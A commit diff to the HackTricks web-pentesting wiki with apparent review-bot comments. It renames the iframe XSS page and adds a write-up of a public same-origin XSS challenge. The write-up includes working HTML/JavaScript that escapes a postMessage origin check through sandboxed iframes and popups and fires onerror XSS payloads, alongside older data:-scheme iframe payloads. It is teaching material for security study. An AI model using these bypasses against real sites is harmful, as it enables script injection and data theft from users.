GitBook: [#3146] No subject
This commit is contained in:
parent
6712e47528
commit
9c1fd6ac98
@ -468,7 +468,7 @@
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
* [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
* [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
* [Iframes in XSS and CSP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
* [Other JS Tricks](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
* [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
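Review bot: the entry's title becomes "Iframes in XSS, CSP and SOP" but the link target stays `pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md`, so the page title and its file name now diverge. Keeping the path avoids breaking existing links, which is fine, but if the file is ever renamed to match the new title, this SUMMARY entry has to be updated in the same commit.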
@ -1,4 +1,4 @@
# Iframes in XSS, CSP and SOP
<details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Iframes in XSS, CSP and SOP
# Iframes in XSS and CSP
## Iframes in XSS
### Iframes in XSS
There are 3 ways to indicate the content of an iframed page:
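Review bot: the added `## Iframes in XSS, CSP and SOP` repeats the page's `#` title word for word, directly after the `</details>` block; since `### Iframes in XSS` already opens the first real section, consider dropping the duplicate `##` heading or giving it a name of its own. The demotion of `## Iframes in XSS` to `###` is consistent with the other heading changes in this commit.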
@ -27,7 +26,7 @@ There are 3 ways to indicate the content of an iframed page:
* Via `src` indicating the content using the `data:` protocol
* Via `srcdoc` indicating the content
#### Accesing Parent & Child vars <a href="#accesing_parent__child_vars_5" id="accesing_parent__child_vars_5"></a>
**Accesing Parent & Child vars**
```html
<html>
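Review bot: the new heading `#### Accesing Parent & Child vars` carries the misspelling over from the replaced bold line; write "Accessing" in the heading text while keeping the existing `href`/`id` value `accesing_parent__child_vars_5`, so in-page links keep resolving.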
@ -63,7 +62,7 @@ alert(parent.secret)
If you access the previous html via a http server (like `python3 -m http.server`) you will notice that all the scripts will be executed (as there is no CSP preventing it)., **the parent won’t be able to access the `secret` var inside any iframe** and **only the iframes if2 & if3 (which are considered to be same-site) can access the secret** in the original window.\
Note how if4 is considered to have `null` origin.
### Iframes with CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
#### Iframes with CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
{% hint style="info" %}
Please, note how in the following bypasses the response to the iframed page doesn't contain any CSP header that prevents JS execution.
@ -117,7 +116,7 @@ if __name__ == "__main__":
app.run()
```
### Other Payloads found on the wild <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
#### Other Payloads found on the wild <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
```html
<!-- This one requires the data: scheme to be allowed -->
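Review bot: since the heading line is being rewritten anyway, fix the wording in `#### Other Payloads found on the wild` to "found in the wild"; the anchor id `other_payloads_found_on_the_wild_64` can stay unchanged so existing links keep working.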
@ -128,7 +127,7 @@ if __name__ == "__main__":
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
```
### Iframe sandbox
#### Iframe sandbox
The `sandbox` attribute enables an extra set of restrictions for the content in the iframe. **By default, no restriction is applied.**
@ -149,6 +148,73 @@ The value of the `sandbox` attribute can either be empty (then all restrictions
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
```
### Iframes in SOP
In this [**challenge**](https://github.com/terjanq/same-origin-xss) created by [**NDevTK**](https://github.com/NDevTK) and [**Terjanq**](https://github.com/terjanq) **** you need you need to exploit a XSS in the coded
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
const data = e.data;
if (e.origin !== window.origin && data.identifier !== identifier) return;
if (data.type === 'render') {
renderContainer.innerHTML = data.body;
}
}
```
The main problem is that the [**main page**](https://so-xss.terjanq.me) uses DomPurify to send the `data.body`, so in order to send your own html data to that code you need to **bypass** `e.origin !== window.origin`.
#### SOP bypass 1
When `//example.org` is embeded into a **sandboxed iframe**, then the page's **origin** will be **`null`**, i.e. `window.origin === 'null'`. So just by embedding the iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` we could force the `null` origin.
If the page was **embeddable** you could bypass that protection that way (cookies might also need to be set to `SameSite=None`).
#### SOP bypass 2
The lesser known fact is that when the **sandbox value `allow-popups` is set** then the **opened popup** will **inherit** all the **sandboxed attributes** unless `allow-popups-to-escape-sandbox` is set.
#### Challenge Solution
Therefore, for this challenge, one could **create** an **iframe**, **open a popup** to the page with the vulnerable XSS code handler (`/iframe.php`), as `window.origin === e.origin` because both are `null` it's possible to **send a payload that will exploit the XSS**.
That **payload** will get the **identifier** and send a **XSS** it **back to the top page** (the page that open the popup), **which** will **change location** to the **vulnerable** `/iframe.php`. Because the identifier is known, it doesn't matter that the condition `window.origin === e.origin` is not satisfied (remember, the origin is the **popup** from the iframe which has **origin** **`null`**) because `data.identifier === identifier`. Then, the **XSS will trigger again**, this time in the correct origin.
```html
<body>
<script>
f = document.createElement('iframe');
// Needed flags
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll('\n',' ');
// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f);
</script>
</body>
```
<details>
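Review bot: the opening sentence of the new "Iframes in SOP" section is broken: "you need you need to exploit a XSS in the coded" duplicates "you need" and stops mid-sentence, so finish it (the vulnerable handler is the `onmessage` snippet that follows) before merging. A few more wording points in the same section: "uses DomPurify to send the `data.body`" should say that the main page sanitizes `data.body` with DOMPurify before posting it, which is why a different sender is needed; "embeded" is "embedded", and the sentence first talks about `//example.org` and then about `so-xss.terjanq.me`, so pick one; "The lesser known fact" reads better as "A lesser-known fact"; and the two long sentences under "Challenge Solution" should be split, e.g. "open a popup to the page with the vulnerable handler (`/iframe.php`). Because both `window.origin` and `e.origin` are `null`, the first payload can be sent." It would also help to state explicitly that the challenge's check `if (e.origin !== window.origin && data.identifier !== identifier) return;` only rejects a message when both the origin and the identifier mismatch, so matching either one is enough; that single `&&` is what makes the null-origin trick and the known identifier each sufficient on their own. In the code, the `// Needed flags` comment on `f.sandbox = 'allow-scripts allow-popups allow-top-navigation';` should say that `allow-popups-to-escape-sandbox` is deliberately left out so the popup inherits the `null` origin described under "SOP bypass 2".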
@ -165,5 +231,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>